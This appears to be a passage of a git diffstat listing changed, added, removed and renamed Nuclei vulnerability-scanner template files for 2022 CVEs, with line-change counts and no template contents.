nuclei-templates/CVE-2022/CVE-2022-0870.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0885.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-0899.yaml | 8 +- ...{CVE-2022-0954.yaml => CVE-2022-0921.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0928.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0948.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0949.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0952.yaml | 47 + nuclei-templates/CVE-2022/CVE-2022-0963.yaml | 64 + nuclei-templates/CVE-2022/CVE-2022-0968.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-1007.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-1013.yaml | 16 +- nuclei-templates/CVE-2022/CVE-2022-1040.yaml | 48 - nuclei-templates/CVE-2022/CVE-2022-1054.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-1057.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-1058.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-1162.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-1168.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-1170.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-1221.yaml | 14 +- nuclei-templates/CVE-2022/CVE-2022-1281.yaml | 41 +- nuclei-templates/CVE-2022/CVE-2022-1329.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-1386.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-1390.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-1391.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-1392.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-1398.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-1439.yaml | 40 - nuclei-templates/CVE-2022/CVE-2022-1442.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-1574.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-1595.yaml | 37 +- nuclei-templates/CVE-2022/CVE-2022-1597.yaml | 36 +- nuclei-templates/CVE-2022/CVE-2022-1724.yaml | 41 - nuclei-templates/CVE-2022/CVE-2022-1756.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-1768.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-1883.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-1903.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-1904.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-1906.yaml | 39 + nuclei-templates/CVE-2022/CVE-2022-1910.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-1916.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-1933.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-1937.yaml | 31 +- nuclei-templates/CVE-2022/CVE-2022-1946.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-1952.yaml | 41 +- nuclei-templates/CVE-2022/CVE-2022-2034.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-21371.yaml | 50 - nuclei-templates/CVE-2022/CVE-2022-21500.yaml | 51 - nuclei-templates/CVE-2022/CVE-2022-21587.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-21661.yaml | 50 + nuclei-templates/CVE-2022/CVE-2022-21705.yaml | 94 + nuclei-templates/CVE-2022/CVE-2022-2174.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-2185.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-2187.yaml | 36 + nuclei-templates/CVE-2022/CVE-2022-2219.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-22242.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-22733.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-22897.yaml | 39 +- nuclei-templates/CVE-2022/CVE-2022-22947.yaml | 97 +- nuclei-templates/CVE-2022/CVE-2022-22954.yaml | 32 +- nuclei-templates/CVE-2022/CVE-2022-22963.yaml | 56 + nuclei-templates/CVE-2022/CVE-2022-22972.yaml | 106 - nuclei-templates/CVE-2022/CVE-2022-23102.yaml | 45 +- nuclei-templates/CVE-2022/CVE-2022-2314.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-23348.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-23544.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-2373.yaml | 34 +- nuclei-templates/CVE-2022/CVE-2022-2376.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-2379.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-23808.yaml | 49 - nuclei-templates/CVE-2022/CVE-2022-2383.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-23854.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-23881.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-23898.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-23944.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-24124.yaml | 50 + nuclei-templates/CVE-2022/CVE-2022-24129.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-2414.yaml | 68 + nuclei-templates/CVE-2022/CVE-2022-24181.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-24223.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-24264.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-24265.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-24266.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-24288.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-24384.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-2446.yaml | 59 + nuclei-templates/CVE-2022/CVE-2022-2462.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-24627.yaml | 31 +- nuclei-templates/CVE-2022/CVE-2022-2467.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-24681.yaml | 51 - nuclei-templates/CVE-2022/CVE-2022-24706.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-24716.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-24816.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-24856.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-2486.yaml | 15 +- nuclei-templates/CVE-2022/CVE-2022-2487.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-2488.yaml | 41 - nuclei-templates/CVE-2022/CVE-2022-24899.yaml | 42 - nuclei-templates/CVE-2022/CVE-2022-24900.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-25082.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-25125.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-25148.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-25149.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-25323.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-2535.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-25356.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-25369.yaml | 16 +- nuclei-templates/CVE-2022/CVE-2022-2544.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-2546.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-25481.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-25485.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-25486.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-25487.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-25488.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-25489.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-25497.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-2551.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-25568.yaml | 51 + nuclei-templates/CVE-2022/CVE-2022-2599.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-26135.yaml | 28 + nuclei-templates/CVE-2022/CVE-2022-26148.yaml | 44 +- nuclei-templates/CVE-2022/CVE-2022-26159.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-26233.yaml | 37 - nuclei-templates/CVE-2022/CVE-2022-26263.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-2627.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-2633.yaml | 52 + nuclei-templates/CVE-2022/CVE-2022-26352.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-26564.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-26833.yaml | 15 +- nuclei-templates/CVE-2022/CVE-2022-26960.yaml | 40 - nuclei-templates/CVE-2022/CVE-2022-2733.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-2756.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-27593.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-27849.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-27926.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-27927.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-27984.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-27985.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-28022.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-28023.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-28032.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-28079.yaml | 45 - nuclei-templates/CVE-2022/CVE-2022-28117.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-28219.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-28290.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-2863.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-28923.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-28955.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-29004.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-29005.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-29006.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-29007.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-29009.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-29013.yaml | 52 + nuclei-templates/CVE-2022/CVE-2022-29014.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-29078.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-29153.yaml | 37 +- nuclei-templates/CVE-2022/CVE-2022-29272.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-29298.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-29301.yaml | 42 - nuclei-templates/CVE-2022/CVE-2022-29303.yaml | 42 - nuclei-templates/CVE-2022/CVE-2022-29349.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-29383.yaml | 42 + nuclei-templates/CVE-2022/CVE-2022-29455.yaml | 47 + nuclei-templates/CVE-2022/CVE-2022-29464.yaml | 44 + nuclei-templates/CVE-2022/CVE-2022-29548.yaml | 34 +- nuclei-templates/CVE-2022/CVE-2022-29775.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-30073.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-30489.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-30512.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-30513.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-30514.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-30525.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-3062.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-30777.yaml | 46 - nuclei-templates/CVE-2022/CVE-2022-31126.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-31137.yaml | 34 - nuclei-templates/CVE-2022/CVE-2022-31268.yaml | 48 - nuclei-templates/CVE-2022/CVE-2022-31269.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-31299.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-31373.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-3142.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-31474.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-31499.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-31656.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-31793.yaml | 40 - nuclei-templates/CVE-2022/CVE-2022-31798.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-31814.yaml | 32 +- nuclei-templates/CVE-2022/CVE-2022-31845.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-31846.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-31847.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-31854.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-31879.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31974.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31975.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31976.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31977.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31978.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31980.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31981.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31982.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31983.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31984.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-32015.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-32018.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-32024.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-32026.yaml | 47 + nuclei-templates/CVE-2022/CVE-2022-32028.yaml | 14 +- nuclei-templates/CVE-2022/CVE-2022-32094.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-32195.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-32409.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-3242.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-32429.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-32430.yaml | 61 + nuclei-templates/CVE-2022/CVE-2022-32770.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-32771.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-32772.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-33119.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-33891.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-33901.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-33965.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-34045.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-34046.yaml | 32 +- nuclei-templates/CVE-2022/CVE-2022-34048.yaml | 15 +- nuclei-templates/CVE-2022/CVE-2022-34093.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-34094.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-34121.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-34265.yaml | 45 - nuclei-templates/CVE-2022/CVE-2022-34328.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-34576.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-34590.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-34753.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-3484.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-3506.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-35151.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-35405.yaml | 38 +- nuclei-templates/CVE-2022/CVE-2022-35413.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-35493.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-35653.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-3578.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-35914.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-36446.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-36537.yaml | 33 +- nuclei-templates/CVE-2022/CVE-2022-36553.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-36642.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-36804.yaml | 57 +- nuclei-templates/CVE-2022/CVE-2022-36883.yaml | 27 + nuclei-templates/CVE-2022/CVE-2022-37042.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-37153.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-37190.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-37191.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-37299.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-3768.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-3800.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-38295.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-38296.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-38463.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-38467.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-38553.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-38637.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-38794.yaml | 18 +- nuclei-templates/CVE-2022/CVE-2022-38817.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-38870.yaml | 18 +- nuclei-templates/CVE-2022/CVE-2022-39048.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-3908.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-39195.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-3933.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-3934.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-3980.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-3982.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-39952.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-39960.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-39986.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-40022.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-40032.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-40047.yaml | 4 +- nuclei-templates/CVE-2022/CVE-2022-40083.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-40127.yaml | 39 +- nuclei-templates/CVE-2022/CVE-2022-40359.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-4049.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-4050.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-4057.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-4059.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-4060.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-4063.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-40734.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-40843.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-40879.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-40881.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-41040.yaml | 41 - nuclei-templates/CVE-2022/CVE-2022-4117.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-4140.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-41412.yaml | 14 +- nuclei-templates/CVE-2022/CVE-2022-41441.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-41473.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-41840.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-42094.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-42095.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-42096.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-42233.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-4260.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-42746.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-42747.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-42748.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-42749.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-4295.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-4301.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-43014.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-43015.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-43016.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-43017.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-43018.yaml | 18 +- nuclei-templates/CVE-2022/CVE-2022-4305.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-4306.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-43140.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-43164.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43165.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43166.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43167.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43169.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43170.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43185.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-4320.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-4321.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-4325.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-4328.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-43769.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-44290.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44291.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-4447.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-44877.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-44944.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-44946.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-44947.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-44948.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44949.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44950.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44951.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44952.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44957.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-45037.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-45038.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-45354.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-45362.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-45365.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-45805.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-45835.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-45917.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-45933.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-46020.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-46071.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-46073.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-46169.yaml | 38 +- nuclei-templates/CVE-2022/CVE-2022-46381.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-46443.yaml | 31 +- nuclei-templates/CVE-2022/CVE-2022-46463.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-46888.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-46934.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-47002.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-47003.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-47075.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-47615.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-47945.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-47966.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-47986.yaml | 33 +- nuclei-templates/CVE-2022/CVE-2022-48012.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-48165.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-48197.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-4897.yaml | 8 +- nuclei-templates/CVE-2022/cve-2022-0140.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-0148.yaml | 62 + nuclei-templates/CVE-2022/cve-2022-0149.yaml | 49 - nuclei-templates/CVE-2022/cve-2022-0165.yaml | 29 - ...{CVE-2022-0201.yaml => cve-2022-0201.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-0208.yaml | 27 +- nuclei-templates/CVE-2022/cve-2022-0271.yaml | 54 + nuclei-templates/CVE-2022/cve-2022-0281.yaml | 51 + nuclei-templates/CVE-2022/cve-2022-0346.yaml | 23 +- nuclei-templates/CVE-2022/cve-2022-0381.yaml | 37 - nuclei-templates/CVE-2022/cve-2022-0422.yaml | 50 - ...{CVE-2022-0432.yaml => cve-2022-0432.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-0437.yaml | 61 + nuclei-templates/CVE-2022/cve-2022-0540.yaml | 19 +- nuclei-templates/CVE-2022/cve-2022-0591.yaml | 44 +- nuclei-templates/CVE-2022/cve-2022-0594.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-0595.yaml | 23 +- nuclei-templates/CVE-2022/cve-2022-0599.yaml | 48 - nuclei-templates/CVE-2022/cve-2022-0653.yaml | 53 + nuclei-templates/CVE-2022/cve-2022-0656.yaml | 54 + nuclei-templates/CVE-2022/cve-2022-0660.yaml | 29 +- nuclei-templates/CVE-2022/cve-2022-0952.yaml | 52 - nuclei-templates/CVE-2022/cve-2022-0963.yaml | 71 - ...{CVE-2022-1020.yaml => cve-2022-1020.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-1040.yaml | 58 + nuclei-templates/CVE-2022/cve-2022-1119.yaml | 21 +- nuclei-templates/CVE-2022/cve-2022-1392.yaml | 49 + nuclei-templates/CVE-2022/cve-2022-1439.yaml | 50 + nuclei-templates/CVE-2022/cve-2022-1598.yaml | 29 +- ...{CVE-2022-1609.yaml => cve-2022-1609.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-1713.yaml | 18 +- nuclei-templates/CVE-2022/cve-2022-1724.yaml | 69 + nuclei-templates/CVE-2022/cve-2022-1815.yaml | 26 +- nuclei-templates/CVE-2022/cve-2022-1904.yaml | 42 - nuclei-templates/CVE-2022/cve-2022-1906.yaml | 45 - nuclei-templates/CVE-2022/cve-2022-21371.yaml | 64 + nuclei-templates/CVE-2022/cve-2022-21500.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-21705.yaml | 109 - nuclei-templates/CVE-2022/cve-2022-2187.yaml | 43 - ...VE-2022-22536.yaml => cve-2022-22536.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-2290.yaml | 22 +- nuclei-templates/CVE-2022/cve-2022-22963.yaml | 38 - nuclei-templates/CVE-2022/cve-2022-22972.yaml | 113 + nuclei-templates/CVE-2022/cve-2022-23134.yaml | 33 +- ...VE-2022-23178.yaml => cve-2022-23178.yaml} | 0 ...VE-2022-23347.yaml => cve-2022-23347.yaml} | 0 ...VE-2022-23779.yaml => cve-2022-23779.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-23808.yaml | 60 + nuclei-templates/CVE-2022/cve-2022-23881.yaml | 49 + ...VE-2022-24112.yaml => cve-2022-24112.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-24124.yaml | 41 - ...VE-2022-24260.yaml => cve-2022-24260.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-24681.yaml | 62 + nuclei-templates/CVE-2022/cve-2022-2488.yaml | 51 + nuclei-templates/CVE-2022/cve-2022-24899.yaml | 51 + ...VE-2022-24990.yaml => cve-2022-24990.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-25216.yaml | 26 +- nuclei-templates/CVE-2022/cve-2022-25323.yaml | 52 + ...VE-2022-26134.yaml => cve-2022-26134.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-26135.yaml | 32 - nuclei-templates/CVE-2022/cve-2022-26138.yaml | 21 +- nuclei-templates/CVE-2022/cve-2022-26233.yaml | 46 + nuclei-templates/CVE-2022/cve-2022-26960.yaml | 50 + nuclei-templates/CVE-2022/cve-2022-27849.yaml | 46 - nuclei-templates/CVE-2022/cve-2022-28079.yaml | 54 + nuclei-templates/CVE-2022/cve-2022-28080.yaml | 22 +- nuclei-templates/CVE-2022/cve-2022-28219.yaml | 67 + nuclei-templates/CVE-2022/cve-2022-28363.yaml | 34 +- nuclei-templates/CVE-2022/cve-2022-28365.yaml | 27 +- nuclei-templates/CVE-2022/cve-2022-29014.yaml | 49 + nuclei-templates/CVE-2022/cve-2022-29299.yaml | 16 +- nuclei-templates/CVE-2022/cve-2022-29301.yaml | 48 + nuclei-templates/CVE-2022/cve-2022-29303.yaml | 58 + nuclei-templates/CVE-2022/cve-2022-29383.yaml | 46 - nuclei-templates/CVE-2022/cve-2022-29455.yaml | 56 - nuclei-templates/CVE-2022/cve-2022-29464.yaml | 48 - nuclei-templates/CVE-2022/cve-2022-30776.yaml | 20 +- 